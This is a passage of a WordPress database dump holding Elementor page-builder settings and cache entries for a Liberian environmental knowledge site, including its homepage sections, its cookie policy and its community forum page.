":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?<\\/p>\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19847,2902,'_elementor_version','2.7.5'),(19848,2902,'_elementor_template_type','wp-page'),(19849,2902,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19853,1590,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628955745;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:2704;}i:2;a:1:{s:2:\"id\";i:2769;}}}}'),(19854,470,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628741670;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:474;}i:1;a:1:{s:2:\"id\";i:471;}i:2;a:1:{s:2:\"id\";i:467;}}}}'),(19855,471,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628703421;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:469;}i:1;a:1:{s:2:\"id\";i:470;}i:2;a:1:{s:2:\"id\";i:467;}}}}'),(19856,1600,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629101737;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1598;}i:1;a:1:{s:2:\"id\";i:1592;}i:2;a:1:{s:2:\"id\";i:1582;}}}}'),(19857,2457,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629019224;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1608;}i:1;a:1:{s:2:\"id\";i:1582;}i:2;a:1:{s:2:\"id\";i:1586;}}}}'),(19858,1586,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629052645;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:1588;}i:2;a:1:{s:2:\"id\";i:2704;}}}}'),(19859,2904,'_elementor_controls_usage','a:0:{}'),(19860,2904,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1628336731;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:9;}i:1;a:1:{s:2:\"id\";i:102;}}}}'),(19861,2905,'_elementor_edit_mode','builder'),(19862,2905,'_elementor_template_type','wp-page'),(19863,2905,'_elementor_version','2.7.5'),(19864,2905,'_wp_page_template','default'),(19865,2905,'_elementor_data','[{\"id\":\"f41560c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"81ad8aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c2af956\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dc9f7b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cookie Policy for Environmental Knowledge Management System\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5d7f54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 15px;\\\">This is the Cookie Policy for Environmental Knowledge Management System, accessible from <\\/span><a style=\\\"font-size: 15px; background-color: #ffffff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\\">https:\\/\\/ekmsliberia.info<\\/a><\\/p><h2><strong>What Are Cookies<\\/strong><\\/h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.<\\/p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.<\\/p><h2><strong>How We Use Cookies<\\/strong><\\/h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.<\\/p><h2><strong>Disabling Cookies<\\/strong><\\/h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.<\\/p><h2><strong>The Cookies We Set<\\/strong><\\/h2><ul><li><p>Account related cookies<\\/p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.<\\/p><\\/li><li><p>Login related cookies<\\/p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.<\\/p><\\/li><li><p>Email newsletters related cookies<\\/p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed\\/unsubscribed users.<\\/p><\\/li><li><p>Forms related cookies<\\/p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.<\\/p><\\/li><li><p>Site preferences cookies<\\/p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.<\\/p><\\/li><\\/ul><h2><strong>Third Party Cookies<\\/strong><\\/h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.<\\/p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.<\\/p><p>For more information on Google Analytics cookies, see the official Google Analytics page.<\\/p><\\/li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.<\\/p><\\/li><li><p>We also use social media buttons and\\/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.<\\/p><\\/li><\\/ul><p><strong>More Information<\\/strong><\\/p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site.\\u00a0<\\/p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:<\\/p><ul><li>Email: <a href=\\\"mailto:contact@ekmsliberia.info\\\">contact@ekmsliberia.info<\\/a><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19866,2905,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:11:\"header_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(19868,2906,'_elementor_edit_mode','builder'),(19869,2906,'_elementor_template_type','wp-page'),(19870,2906,'_elementor_version','2.7.5'),(19871,2906,'_wp_page_template','default'),(19872,2906,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.\\n\\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.\\n\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n\\nFeel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong><span style=\\\"color: #ff6600;\\\">Please note that any inappropriate contents including topics\\/questions\\/comments\\/images\\/videos posted on the community forum, will be removed by the forum moderators.<\\/span><\\/strong>\\n\\nIf you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Join Us<\\/span>!<\\/a>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(19875,2907,'_elementor_edit_mode','builder'),(19876,2907,'_elementor_template_type','wp-page'),(19877,2907,'_elementor_version','2.7.5'),(19878,2907,'_wp_page_template','default'),(19879,2907,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb